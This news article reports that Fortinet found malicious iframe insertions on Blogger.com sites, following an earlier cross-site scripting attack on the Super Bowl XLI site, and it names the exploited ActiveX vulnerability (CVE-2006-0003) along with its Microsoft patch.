A few weeks ago, casual surfers to the official Super Bowl XLI site were exposed to malicious exploits, not by design but rather because vandals attempted to poison a legitimate Web experience. The process is called cross-site scripting, where vandals add a snippet of malicious code to a site's URL. If the site is vulnerable to such an attack (and many sites are), the code is accepted by the Web server and added to the display page. Future visitors to the site will then download the malicious code along with the page they intended to view.
Now, security vendor Fortinet reports that Google-owned Blogger.com sites are also vulnerable. Using Exploit Prevention Labs Linkscanner Pro, CNET confirmed one of the example blog sites provided by Fortinet does currently contain a malicious iframe insertion. Iframes are used by Web designers to open additional windows (often hosted on other sites) within a main Web page; iframes can also be used by criminal hackers to redirect browsers to malicious-code sites. In the example provided by Fortinet, the iframe instruction appears as URL Escape Code characters, two-character hexadecimal (8-bit) values usually starting with a "%" character, such as "%3C," making it hard to read what the code intends to do.
Chances are the owner of the blog did not include this code on his page, and has not checked the page since posting his original blog. Using Linkscanner Pro on the page, we found the malicious code uses an unspecified vulnerability within the RDS.Dataspace ActiveX control (CVE-2006-0003). Visitors to this particular infected blog site who have not installed the patches within Microsoft Security Bulletin MS06-014 might be vulnerable to remote code execution on their desktops. Fortinet says it has found other examples of Blogger.com content targeted with cross-site scripting malicious code, including sites on topics as diverse as Star Wars, school, furniture, and girlfriends.